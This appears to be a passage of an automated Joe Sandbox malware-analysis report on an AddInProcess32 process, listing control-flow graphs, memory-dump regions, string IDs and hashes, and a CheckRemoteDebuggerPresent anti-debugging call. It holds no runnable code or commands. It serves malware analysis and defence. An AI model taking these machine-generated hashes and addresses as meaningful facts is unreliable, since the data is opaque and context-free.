                    control_flow_graph 135 481070-48108c 136 48108e-481091 135->136 137 481093-4810af 136->137 138 4810b4-4810b6 136->138 137->138 139 4810b8 138->139 140 4810bd-4810c0 138->140 139->140 140->136 141 4810c2-4811dd 140->141 161 4811e9-4811f8 141->161 162 4811df-4811e3 141->162 163 4811fe-481207 161->163 164 481656-481660 161->164 162->161 165 48164c-481651 163->165 166 48120d-481218 163->166 165->164 167 48121e-481235 166->167 168 481626-481632 166->168 167->168 172 48123b-481244 167->172 168->163 169 481638 168->169 169->164 172->165 173 48124a-48126f 172->173 176 481614-481620 173->176 177 481275-48128c 173->177 176->168 176->172 177->176 179 481292-48129b 177->179 179->165 180 4812a1-4812bb 179->180 182 4812c2-4812c4 180->182 183 48130e-481321 182->183 184 4812c6-4812d6 182->184 185 4815f0-4815f4 183->185 189 4812d8-4812e8 184->189 190 481326-481359 184->190 186 4815ff-481600 185->186 187 4815f6 185->187 186->176 187->186 189->190 194 4812ea-4812fa 189->194 199 48139b-4813ab 190->199 200 48135b-481399 190->200 194->190 197 4812fc-48130c 194->197 197->183 197->190 204 4813ad-4813b3 199->204 205 4813c3-4813d8 199->205 210 4813da-481441 200->210 206 4813b5 204->206 207 4813b7-4813b9 204->207 205->210 206->205 207->205 219 4814f3-481513 210->219 220 481447-48144a 210->220 229 48156b-481577 219->229 230 481515-481556 219->230 221 481450-481460 220->221 222 4815d1-4815d6 220->222 226 4814e9-4814ed 221->226 227 481466-4814bb 221->227 231 4815db-4815ee 222->231 226->219 226->220 227->222 253 4814c1-4814db 227->253 235 481579-48157f 229->235 236 48158f-4815a4 229->236 230->222 252 481558-481569 230->252 231->185 238 481581 235->238 239 481583-481585 235->239 244 4815a6-4815cf 236->244 238->236 239->236 244->231 252->244 253->222 257 4814e1-4814e7 253->257 257->219
                    Strings
                    Memory Dump Source
                    • Source File: 0000000B.00000002.492677495.0000000000480000.00000040.00000800.00020000.00000000.sdmp, Offset: 00480000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_11_2_480000_AddInProcess32.jbxd
                    Similarity
                    • API ID:
                    • String ID: $p$$p$$p$$p$$p$$p
                    • API String ID: 0-3402276426
                    • Opcode ID: 35d04a202c84bc48c9aba9808432d0c69e71d208117b9cb5407942777a4d9c48
                    • Instruction ID: 804080e485280c3b3ef718971f8c619e2d16f25957731da9f33d56f165a20178
                    • Opcode Fuzzy Hash: 35d04a202c84bc48c9aba9808432d0c69e71d208117b9cb5407942777a4d9c48
                    • Instruction Fuzzy Hash: 53F12A30B00204CFDB19EFA4D595B6EB7B6EF98304F24896AD405AB369DB35DD42CB44

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 398 483130-48316a 399 48316c-48318b 398->399 400 483190-4831ae 398->400 399->400 405 4831b0-4831b8 400->405 406 4831c6-4831dc 400->406 405->406 409 4831e7-4831e9 406->409 410 4831eb-4831f3 409->410 411 483201-483272 409->411 410->411 421 48329e-4832ba 411->421 422 483274-483297 411->422 427 4832bc-4832df 421->427 428 4832e6-483301 421->428 422->421 427->428 433 48332c-483347 428->433 434 483303-483325 428->434 439 483349-48336b 433->439 440 483372-483a71 433->440 434->433 439->440
                    Strings
                    Memory Dump Source
                    • Source File: 0000000B.00000002.492677495.0000000000480000.00000040.00000800.00020000.00000000.sdmp, Offset: 00480000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_11_2_480000_AddInProcess32.jbxd
                    Similarity
                    • API ID:
                    • String ID: $p$$p
                    • API String ID: 0-580715581
                    • Opcode ID: 6470cca76c7ea1a838d0be9896c34c9ca2b989276614e59d4c0ca4dac895fb26
                    • Instruction ID: 48268f8762d3e625ae9edd9fb9ba4f80c7dbcfbd21538aa0deda5c5956a7da1c
                    • Opcode Fuzzy Hash: 6470cca76c7ea1a838d0be9896c34c9ca2b989276614e59d4c0ca4dac895fb26
                    • Instruction Fuzzy Hash: B6516134B002068FDB55EF64D9A0BAE73F6EB88705F14886AC806EB395EB34DD058B54

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 976 1c5301-1c538c CheckRemoteDebuggerPresent 978 1c538e-1c5394 976->978 979 1c5395-1c53d0 976->979 978->979
                    APIs
                    • CheckRemoteDebuggerPresent.KERNEL32(?,?), ref: 001C537F
                    Memory Dump Source
                    • Source File: 0000000B.00000002.492638416.00000000001C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001C0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_11_2_1c0000_AddInProcess32.jbxd
                    Similarity
                    • API ID: CheckDebuggerPresentRemote
                    • String ID:
                    • API String ID: 3662101638-0
                    • Opcode ID: de7fd9e427d919e48b8932673aa7b0fad8acc9c260f1a3a16ec2ce1318b1b51a
                    • Instruction ID: 22158625b108a4bcf533077d39b337e21aeaa2dfa4eb393c030183f0fce89231
                    • Opcode Fuzzy Hash: de7fd9e427d919e48b8932673aa7b0fad8acc9c260f1a3a16ec2ce1318b1b51a
                    • Instruction Fuzzy Hash: 202136B1C002598FCB10CF9AD484BEEBBF5AF49320F24845ED459B7251D378AA84CF61

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 982 1c5308-1c538c CheckRemoteDebuggerPresent 984 1c538e-1c5394 982->984 985 1c5395-1c53d0 982->985 984->985
                    APIs
                    • CheckRemoteDebuggerPresent.KERNEL32(?,?), ref: 001C537F
                    Memory Dump Source
                    • Source File: 0000000B.00000002.492638416.00000000001C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001C0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_11_2_1c0000_AddInProcess32.jbxd
                    Similarity
                    • API ID: CheckDebuggerPresentRemote
                    • String ID:
                    • API String ID: 3662101638-0
                    • Opcode ID: 7d2af112cff1fa8b449175afe10539a128ce64a11cd9ea53d8e5f5a65867951f
                    • Instruction ID: 086509a83662f5ab4f88b46c1955b5af1ea456ecfc9c5c7fd470df551bbaed52
                    • Opcode Fuzzy Hash: 7d2af112cff1fa8b449175afe10539a128ce64a11cd9ea53d8e5f5a65867951f
                    • Instruction Fuzzy Hash: 9D2128B1C002598FCB00CF9AD484BEEFBF5AF49320F14845AD455A7350D778A944CFA1

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 988 484f30-484f49 989 484f4b-484f4e 988->989 990 484f5b-484f5e 989->990 991 484f50-484f54 989->991 994 484f80-484f83 990->994 995 484f60-484f71 990->995 992 484f99-484fa2 991->992 993 484f56 991->993 998 484fa8-484fae 992->998 999 48507b-485085 992->999 993->990 996 484f90-484f93 994->996 997 484f85-484f8f 994->997 1068 484f73 call 484f20 995->1068 1069 484f73 call 484f30 995->1069 996->992 1001 485086-485089 996->1001 1002 4850c8-4850fd 998->1002 1003 484fb4-484fd3 998->1003 1004 48508b-4850a7 1001->1004 1005 4850ac-4850ae 1001->1005 1013 4850ff-485102 1002->1013 1018 484fd9-485014 1003->1018 1019 48506c-485075 1003->1019 1004->1005 1007 4850b0 1005->1007 1008 4850b5-4850b8 1005->1008 1007->1008 1008->989 1012 4850be-4850c7 1008->1012 1009 484f79-484f7b 1009->994 1015 485108-48512e 1013->1015 1016 48525e-485261 1013->1016 1033 485135-485163 1015->1033 1020 485263-48527f 1016->1020 1021 485284-485286 1016->1021 1037 48501e-485028 1018->1037 1038 485016-485019 1018->1038 1019->998 1019->999 1020->1021 1022 485288 1021->1022 1023 48528d-485290 1021->1023 1022->1023 1023->1013 1025 485296-48529f 1023->1025 1047 4851da-4851fe 1033->1047 1048 485165-48516f 1033->1048 1037->1019 1041 48502a-48503e 1037->1041 1038->1012 1045 48504c 1041->1045 1046 485040-48504a 1041->1046 1050 485051-485053 1045->1050 1046->1050 1059 485208 1047->1059 1060 485200 1047->1060 1054 485171-485177 1048->1054 1055 485187-4851d8 1048->1055 1052 48505f-48506a 1050->1052 1053 485055-485058 1050->1053 1052->1019 1052->1041 1053->1052 1057 485179 1054->1057 1058 48517b-48517d 1054->1058 1055->1047 1055->1048 1057->1055 1058->1055 1059->1016 1060->1059 1068->1009 1069->1009
                    Strings
                    Memory Dump Source
                    • Source File: 0000000B.00000002.492677495.0000000000480000.00000040.00000800.00020000.00000000.sdmp, Offset: 00480000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_11_2_480000_AddInProcess32.jbxd
                    Similarity
                    • API ID:
                    • String ID: PHp
                    • API String ID: 0-2495607638
                    • Opcode ID: 7e2744a4cc2278920ed88ccfd56d73aa651e06a033885db3da43288d579367e7
                    • Instruction ID: b443376783a37fcd05d9934f467f6efc9a8c1cc8cadf680a906bb316fa5b9389
                    • Opcode Fuzzy Hash: 7e2744a4cc2278920ed88ccfd56d73aa651e06a033885db3da43288d579367e7
                    • Instruction Fuzzy Hash: 6A812531B001058FCF15AB68D8947AFBBE2EBC9314F24486AD406DB395DF39CD468B99

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 1354 482050-48207f 1355 482081-482084 1354->1355 1356 482086-4820a2 1355->1356 1357 4820a7-4820aa 1355->1357 1356->1357 1358 4820b0-4820bc 1357->1358 1359 482157-48215a 1357->1359 1365 4820c7-4820c9 1358->1365 1361 482390-482392 1359->1361 1362 482160-48216f 1359->1362 1363 482399-48239c 1361->1363 1364 482394 1361->1364 1371 48218e-4821d2 1362->1371 1372 482171-48218c 1362->1372 1363->1355 1367 4823a2-4823ab 1363->1367 1364->1363 1369 4820cb-4820d1 1365->1369 1370 4820e1-4820e5 1365->1370 1373 4820d3 1369->1373 1374 4820d5-4820d7 1369->1374 1375 4820f3 1370->1375 1376 4820e7-4820f1 1370->1376 1382 4821d8-4821e9 1371->1382 1383 482364-48237a 1371->1383 1372->1371 1373->1370 1374->1370 1377 4820f8-4820fa 1375->1377 1376->1377 1380 4820fc-4820ff 1377->1380 1381 482111-48214a 1377->1381 1380->1367 1381->1362 1398 48214c-482156 1381->1398 1390 48234f-48235e 1382->1390 1391 4821ef-48220c 1382->1391 1383->1361 1390->1382 1390->1383 1391->1390 1397 482212-482309 1391->1397 1421 48230b-482315 1397->1421 1422 482317 1397->1422 1423 48231c-48231e 1421->1423 1422->1423 1423->1390 1424 482320-482325 1423->1424 1425 482333 1424->1425 1426 482327-482331 1424->1426 1427 482338-48233a 1425->1427 1426->1427 1427->1390 1428 48233c-482348 1427->1428 1428->1390
                    Strings
                    Memory Dump Source
                    • Source File: 0000000B.00000002.492677495.0000000000480000.00000040.00000800.00020000.00000000.sdmp, Offset: 00480000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_11_2_480000_AddInProcess32.jbxd
                    Similarity
                    • API ID:
                    • String ID: $p
                    • API String ID: 0-982128392
                    • Opcode ID: e1f8a2d5f5746903637a0d301dca0c0b666118ed479b70e3361be8982ac149ce
                    • Instruction ID: 8cbeb4d0cd2eb4bfba14982be4b6f40cec19ae13e9806f0189db5f9247127e06
                    • Opcode Fuzzy Hash: e1f8a2d5f5746903637a0d301dca0c0b666118ed479b70e3361be8982ac149ce
                    • Instruction Fuzzy Hash: 42115932B002049BCB24AD20DA406AEB765EB81310F104C6BCE05EB382DBB8DC4AC745
                    Memory Dump Source
                    • Source File: 0000000B.00000002.492677495.0000000000480000.00000040.00000800.00020000.00000000.sdmp, Offset: 00480000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_11_2_480000_AddInProcess32.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 866b4b94cb3d81e04b1de20cc097454167a4e87089f6450c9c9b02d6bed58bd6
                    • Instruction ID: c31a0d75409439bb3b34997bfb280411df727e47a70c71f12df09f7a4e798d2b
                    • Opcode Fuzzy Hash: 866b4b94cb3d81e04b1de20cc097454167a4e87089f6450c9c9b02d6bed58bd6
                    • Instruction Fuzzy Hash: F7814E70A00204CFDB19EF64D581B5EB7B6FF94305F68852AD405AB3A9DB35ED82CB44
                    Memory Dump Source
                    • Source File: 0000000B.00000002.492677495.0000000000480000.00000040.00000800.00020000.00000000.sdmp, Offset: 00480000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_11_2_480000_AddInProcess32.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 1f4c042da60712161a49f9b9dc1837fab7927224e299d36b0dc8a0df90571783
                    • Instruction ID: ad43a8746ce75c66f97131cfb7f71ab89a4427fd065e4c46dff6445d0bad7c0d
                    • Opcode Fuzzy Hash: 1f4c042da60712161a49f9b9dc1837fab7927224e299d36b0dc8a0df90571783
                    • Instruction Fuzzy Hash: 6621C935B101045FCF54EAA8E5907EEB7F6EF85310F14882AD405EB391DB35ED458B84
                    Memory Dump Source
                    • Source File: 0000000B.00000002.492604995.000000000017D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0017D000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_11_2_17d000_AddInProcess32.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 659ad353138d2fc52e4a4cdc4f3cdf7cedde829496efcee78784a3866059a938
                    • Instruction ID: d164b459a808e4dc30d8f9d11a3c02c5438a412f86134e511d9242d1057f6da0
                    • Opcode Fuzzy Hash: 659ad353138d2fc52e4a4cdc4f3cdf7cedde829496efcee78784a3866059a938
                    • Instruction Fuzzy Hash: B321D075604248EFDB15CF14E884B26BB71EF84314F34C5A9E84D4B246C336D847CBA1
                    Memory Dump Source
                    • Source File: 0000000B.00000002.492677495.0000000000480000.00000040.00000800.00020000.00000000.sdmp, Offset: 00480000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_11_2_480000_AddInProcess32.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: e45f15af8f720a55dca0515075bb956abc3f8afea0b0747cc56f873211619411
                    • Instruction ID: b9846f465ce461577f29fd68cb56bd57b11c6471195231d55a43fb4e69b004f8
                    • Opcode Fuzzy Hash: e45f15af8f720a55dca0515075bb956abc3f8afea0b0747cc56f873211619411
                    • Instruction Fuzzy Hash: 9521F534A00209CBDB11EF94D684AAEB7F6FF58306F28851AD801AB325D734ED82CF54
                    Memory Dump Source
                    • Source File: 0000000B.00000002.492677495.0000000000480000.00000040.00000800.00020000.00000000.sdmp, Offset: 00480000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_11_2_480000_AddInProcess32.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: bf73c71a1ab61ef213a4fa2e0dbb1973ecdeab3cbe5030d76156fd329a5479d9
                    • Instruction ID: 713d1cbb46bc75ad260ccc917a9c63e9c2c683cd6a962f0c0e48347818061742
                    • Opcode Fuzzy Hash: bf73c71a1ab61ef213a4fa2e0dbb1973ecdeab3cbe5030d76156fd329a5479d9
                    • Instruction Fuzzy Hash: 1821B731B101089BCF54EAA8E5507AEB7FAEF85310F148826E405EB390DB35EC458B84
                    Memory Dump Source
                    • Source File: 0000000B.00000002.492604995.000000000017D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0017D000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_11_2_17d000_AddInProcess32.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 565f75d38e4f7350f063d62ce24505424e1b395d29b5c826c31e1f917094453a
                    • Instruction ID: ce486fcf9abe6ec95ceb8dbf38f3db559b2253b8cea6385595494ee791a13ebc
                    • Opcode Fuzzy Hash: 565f75d38e4f7350f063d62ce24505424e1b395d29b5c826c31e1f917094453a
                    • Instruction Fuzzy Hash: 92218B755093848FDB12CF24D994B15BF71EF46314F28C5EAD8498F2A7C33A984ACB62
                    Memory Dump Source
                    • Source File: 0000000B.00000002.492677495.0000000000480000.00000040.00000800.00020000.00000000.sdmp, Offset: 00480000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_11_2_480000_AddInProcess32.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 7e7d77efa59f1be05afbed32dd4a3500978de9899381262f93579ab8ba9d1a4e
                    • Instruction ID: e28f21f3d8f9e746cd9f6eaa0481346efca752ba73e1a2fb48c4a4f060d7f396
                    • Opcode Fuzzy Hash: 7e7d77efa59f1be05afbed32dd4a3500978de9899381262f93579ab8ba9d1a4e
                    • Instruction Fuzzy Hash: 7401227270065A1BC7327A3DE80077F6686EBE1714F054C3AE049CB391DB28CD0A4789
                    Memory Dump Source
                    • Source File: 0000000B.00000002.492677495.0000000000480000.00000040.00000800.00020000.00000000.sdmp, Offset: 00480000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_11_2_480000_AddInProcess32.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 4bcb815ecd71cf8aacde6c7dc81d140c18045ed1944f9474241617960cd0b8f7
                    • Instruction ID: 658a2dcce865e1d440e670d869634882c6f8eaac796ba2a1c9ae34ac32e8e4c3
                    • Opcode Fuzzy Hash: 4bcb815ecd71cf8aacde6c7dc81d140c18045ed1944f9474241617960cd0b8f7
                    • Instruction Fuzzy Hash: 8C0181317002154BDB64EA68D89072F73D9EBD9710F108C39E90EDB355EB25DC424388
                    Memory Dump Source
                    • Source File: 0000000B.00000002.492677495.0000000000480000.00000040.00000800.00020000.00000000.sdmp, Offset: 00480000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_11_2_480000_AddInProcess32.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: ab5894d59ee12855faf5bf8e3a84619d157ea5348351253e85bcead71052c15c
                    • Instruction ID: cd0ea557ec3b83e0bcf045c3d2b90018fdcfd07ac1a509dd46dfdcbc90ae3102
                    • Opcode Fuzzy Hash: ab5894d59ee12855faf5bf8e3a84619d157ea5348351253e85bcead71052c15c
                    • Instruction Fuzzy Hash: D2F02235B001098FDF30AAB8E8A4B9FBBA5DBC4329F10083ED605DB381C62488588B81
                    Strings
                    Memory Dump Source
                    • Source File: 0000000B.00000002.492677495.0000000000480000.00000040.00000800.00020000.00000000.sdmp, Offset: 00480000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_11_2_480000_AddInProcess32.jbxd
                    Similarity
                    • API ID:
                    • String ID: $p$$p$$p$$p$$p$$p$$p$$p$$p$$p
                    • API String ID: 0-1868313790
                    • Opcode ID: 2ba54fc96670bf310d855794ba2e8d558798f28cc07de3f7a37182d1f713bf38
                    • Instruction ID: e186f74c96e9d2a6b29e70385f3676ef4d98cd4e5c3915973ca2782116f2427f
                    • Opcode Fuzzy Hash: 2ba54fc96670bf310d855794ba2e8d558798f28cc07de3f7a37182d1f713bf38
                    • Instruction Fuzzy Hash: 81121F30A00215CFDB25EF65C854BAEB7F6BF85304F24896AD40AAB365DB34DD86CB44
                    Strings
                    Memory Dump Source
                    • Source File: 0000000B.00000002.492677495.0000000000480000.00000040.00000800.00020000.00000000.sdmp, Offset: 00480000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_11_2_480000_AddInProcess32.jbxd
                    Similarity
                    • API ID:
                    • String ID: $p$$p$$p$$p
                    • API String ID: 0-3121760203
                    • Opcode ID: 078b5c395ba5618d18cded12188ff955d6535eea37a4b7db329d419be9e999dc
                    • Instruction ID: aade10e5272d5886bad092707bcb8f0971c7105f1945b9bdb22f47c4f1ca8c5b
                    • Opcode Fuzzy Hash: 078b5c395ba5618d18cded12188ff955d6535eea37a4b7db329d419be9e999dc
                    • Instruction Fuzzy Hash: CBB14F30A00214CFDB19EF68D69576EB7F2EF98304F64882AD405AB355DB79DC82CB84
                    Strings
                    Memory Dump Source
                    • Source File: 0000000B.00000002.492677495.0000000000480000.00000040.00000800.00020000.00000000.sdmp, Offset: 00480000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_11_2_480000_AddInProcess32.jbxd
                    Similarity
                    • API ID:
                    • String ID: LRp$LRp$$p$$p
                    • API String ID: 0-727438728
                    • Opcode ID: f0ec5c5fdbad11008aed939139df75a2730e89f724c8ca2dd97e4c16faa20518
                    • Instruction ID: d503b5760e0731e2ba155cb13cec0a5091dc5a6d8624a1ab13243018c627ebd5
                    • Opcode Fuzzy Hash: f0ec5c5fdbad11008aed939139df75a2730e89f724c8ca2dd97e4c16faa20518
                    • Instruction Fuzzy Hash: 7651AF71B002019FCB18FB68D985B6EB7E6FF88304F14896AE4059B3A5DBB5EC45CB44

                    Execution Graph

                    Execution Coverage:12.3%
                    Dynamic/Decrypted Code Coverage:100%
                    Signature Coverage:0%
                    Total number of Nodes:3
                    Total number of Limit Nodes:0
                    execution_graph 15383 1d5308 15384 1d534c CheckRemoteDebuggerPresent 15383->15384 15385 1d538e 15384->15385

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 257 3f1d60-3f1d7e 258 3f1d80-3f1d83 257->258 259 3f1da6-3f1da9 258->259 260 3f1d85-3f1da1 258->260 261 3f1dab-3f1dc5 259->261 262 3f1dca-3f1dcd 259->262 260->259 261->262 263 3f1dcf-3f1dd9 262->263 264 3f1dda-3f1ddd 262->264 267 3f1ddf-3f1ded 264->267 268 3f1df4-3f1df6 264->268 274 3f1e06-3f1e1c 267->274 275 3f1def 267->275 269 3f1dfd-3f1e00 268->269 270 3f1df8 268->270 269->258 269->274 270->269 277 3f2038-3f2042 274->277 278 3f1e22-3f1e2b 274->278 275->268 279 3f2043-3f207f 278->279 280 3f1e31-3f1e4e 278->280 283 3f2081-3f2084 279->283 287 3f2025-3f2032 280->287 288 3f1e54-3f1e7c 280->288 285 3f20a7-3f20aa 283->285 286 3f2086-3f20a2 283->286 289 3f2157-3f215a 285->289 290 3f20b0-3f20bc 285->290 286->285 287->277 287->278 288->287 311 3f1e82-3f1e8b 288->311 291 3f2390-3f2392 289->291 292 3f2160-3f216f 289->292 294 3f20c7-3f20c9 290->294 296 3f2399-3f239c 291->296 297 3f2394 291->297 307 3f218e-3f21d2 292->307 308 3f2171-3f218c 292->308 299 3f20cb-3f20d1 294->299 300 3f20e1-3f20e5 294->300 296->283 298 3f23a2-3f23ab 296->298 297->296 303 3f20d5-3f20d7 299->303 304 3f20d3 299->304 305 3f20e7-3f20f1 300->305 306 3f20f3 300->306 303->300 304->300 310 3f20f8-3f20fa 305->310 306->310 317 3f21d8-3f21e9 307->317 318 3f2364-3f237a 307->318 308->307 313 3f20fc-3f20ff 310->313 314 3f2111-3f214a 310->314 311->279 316 3f1e91-3f1ead 311->316 313->298 314->292 337 3f214c-3f2156 314->337 323 3f2013-3f201f 316->323 324 3f1eb3-3f1edd 316->324 326 3f234f-3f235e 317->326 327 3f21ef-3f220c 317->327 318->291 323->287 323->311 340 3f2009-3f200e 324->340 341 3f1ee3-3f1f0b 324->341 326->317 326->318 327->326 339 3f2212-3f2309 327->339 388 3f230b-3f2315 339->388 389 3f2317 339->389 340->323 341->340 347 3f1f11-3f1f3f 341->347 347->340 353 3f1f45-3f1f4e 347->353 353->340 354 3f1f54-3f1f86 353->354 362 3f1f88-3f1f8c 354->362 363 3f1f91-3f1fad 354->363 362->340 364 3f1f8e 362->364 363->323 365 3f1faf-3f2007 363->365 364->363 365->323 390 3f231c-3f231e 388->390 389->390 390->326 391 3f2320-3f2325 390->391 392 3f2327-3f2331 391->392 393 3f2333 391->393 394 3f2338-3f233a 392->394 393->394 394->326 395 3f233c-3f2348 394->395 395->326
                    Strings
                    Memory Dump Source
                    • Source File: 0000000C.00000002.504222420.00000000003F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 003F0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_12_2_3f0000_AddInProcess32.jbxd
                    Similarity
                    • API ID:
                    • String ID: $p$$p
                    • API String ID: 0-580715581
                    • Opcode ID: 4ccd8d98d30d0cf9f95dcaa5659c2363c01224a6d32926b382c0eb3088917213
                    • Instruction ID: 69ab3c2de3b5ad4814e8be27eab1b20b82638242d2362638b05b317cc061b3b6
                    • Opcode Fuzzy Hash: 4ccd8d98d30d0cf9f95dcaa5659c2363c01224a6d32926b382c0eb3088917213
                    • Instruction Fuzzy Hash: 9C02AF31B0020ACFDB16EB64E494BBEB7E2EF84300F258569E5059B395DB35DD86CB90
                    Memory Dump Source
                    • Source File: 0000000C.00000002.504222420.00000000003F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 003F0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_12_2_3f0000_AddInProcess32.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: fbf7a1bc1342da1b3f48c0540d8af0274850e9c4ea85638cc87871bbca46b389
                    • Instruction ID: 2528f83977be1ed69a45c937af3d4613311c8bdd92d5ee22c2534604ced575f0
                    • Opcode Fuzzy Hash: fbf7a1bc1342da1b3f48c0540d8af0274850e9c4ea85638cc87871bbca46b389
                    • Instruction Fuzzy Hash: E762A034B002088FDB2ADB68D594BADB7F2EF84310F158969E505DB396DB35ED45CB80

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 135 3f1070-3f108c 136 3f108e-3f1091 135->136 137 3f10b4-3f10b6 136->137 138 3f1093-3f10af 136->138 139 3f10bd-3f10c0 137->139 140 3f10b8 137->140 138->137 139->136 141 3f10c2-3f11dd 139->141 140->139 161 3f11df-3f11e3 141->161 162 3f11e9-3f11f8 141->162 161->162 163 3f11fe-3f1207 162->163 164 3f1656-3f1660 162->164 165 3f120d-3f1218 163->165 166 3f164c-3f1651 163->166 167 3f121e-3f1235 165->167 168 3f1626-3f1632 165->168 166->164 167->168 172 3f123b-3f1244 167->172 168->163 169 3f1638 168->169 169->164 172->166 173 3f124a-3f126f 172->173 176 3f1275-3f128c 173->176 177 3f1614-3f1620 173->177 176->177 179 3f1292-3f129b 176->179 177->168 177->172 179->166 180 3f12a1-3f12bb 179->180 182 3f12c2-3f12c4 180->182 183 3f130e-3f1321 182->183 184 3f12c6-3f12d6 182->184 185 3f15f0-3f15f4 183->185 189 3f12d8-3f12e8 184->189 190 3f1326-3f1359 184->190 186 3f15ff 185->186 187 3f15f6 185->187 186->177 187->186 189->190 193 3f12ea-3f12fa 189->193 198 3f139b-3f13ab 190->198 199 3f135b-3f1399 190->199 193->190 196 3f12fc-3f130c 193->196 196->183 196->190 203 3f13ad-3f13b3 198->203 204 3f13c3-3f13d8 198->204 209 3f13da-3f1441 199->209 206 3f13b7-3f13b9 203->206 207 3f13b5 203->207 204->209 206->204 207->204 218 3f1447-3f144a 209->218 219 3f14f3-3f1513 209->219 220 3f15d1-3f15d6 218->220 221 3f1450-3f1460 218->221 228 3f156b-3f1577 219->228 229 3f1515-3f1556 219->229 230 3f15db-3f15ee 220->230 225 3f14e9-3f14ed 221->225 226 3f1466-3f14bb 221->226 225->218 225->219 226->220 252 3f14c1-3f14db 226->252 235 3f158f-3f15a4 228->235 236 3f1579-3f157f 228->236 229->220 251 3f1558-3f1569 229->251 230->185 243 3f15a6-3f15cf 235->243 237 3f1583-3f1585 236->237 238 3f1581 236->238 237->235 238->235 243->230 251->243 252->220 256 3f14e1-3f14e7 252->256 256->219
                    Strings
                    Memory Dump Source
                    • Source File: 0000000C.00000002.504222420.00000000003F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 003F0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_12_2_3f0000_AddInProcess32.jbxd
                    Similarity
                    • API ID:
                    • String ID: $p$$p$$p$$p$$p$$p
                    • API String ID: 0-3402276426
                    • Opcode ID: 39191133b500f636398ae23b892d1f89933309b649b811e6ee207317712a87c1
                    • Instruction ID: d1fe6dbccc210b65f99b2425565f5f1a229f5a39885d29b3d16bae6df3a720c0
                    • Opcode Fuzzy Hash: 39191133b500f636398ae23b892d1f89933309b649b811e6ee207317712a87c1
                    • Instruction Fuzzy Hash: 7BF12D70B01209CFDB1AEF64E454B6EB7B2EF98300F658569E4059B359DB35EC82CB90

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 397 3f3130-3f316a 398 3f316c-3f318b 397->398 399 3f3190-3f31ae 397->399 398->399 404 3f31c6-3f31dc 399->404 405 3f31b0-3f31b8 399->405 408 3f31e7-3f31e9 404->408 405->404 409 3f31eb-3f31f3 408->409 410 3f3201-3f3272 408->410 409->410 420 3f329e-3f32ba 410->420 421 3f3274-3f3297 410->421 426 3f32bc-3f32df 420->426 427 3f32e6-3f3301 420->427 421->420 426->427 432 3f332c-3f3347 427->432 433 3f3303-3f3325 427->433 438 3f3349-3f336b 432->438 439 3f3372-3f3a71 432->439 433->432 438->439
                    Strings
                    Memory Dump Source
                    • Source File: 0000000C.00000002.504222420.00000000003F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 003F0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_12_2_3f0000_AddInProcess32.jbxd
                    Similarity
                    • API ID:
                    • String ID: $p$$p
                    • API String ID: 0-580715581
                    • Opcode ID: 3711378bd56c93d035a8281d081241269fcc02e8607250488e4ee308ca188f0d
                    • Instruction ID: 5e7b5af199e9232004387cdbf83a295cdd9d7f0713075b4fdaff1547fe173e9b
                    • Opcode Fuzzy Hash: 3711378bd56c93d035a8281d081241269fcc02e8607250488e4ee308ca188f0d
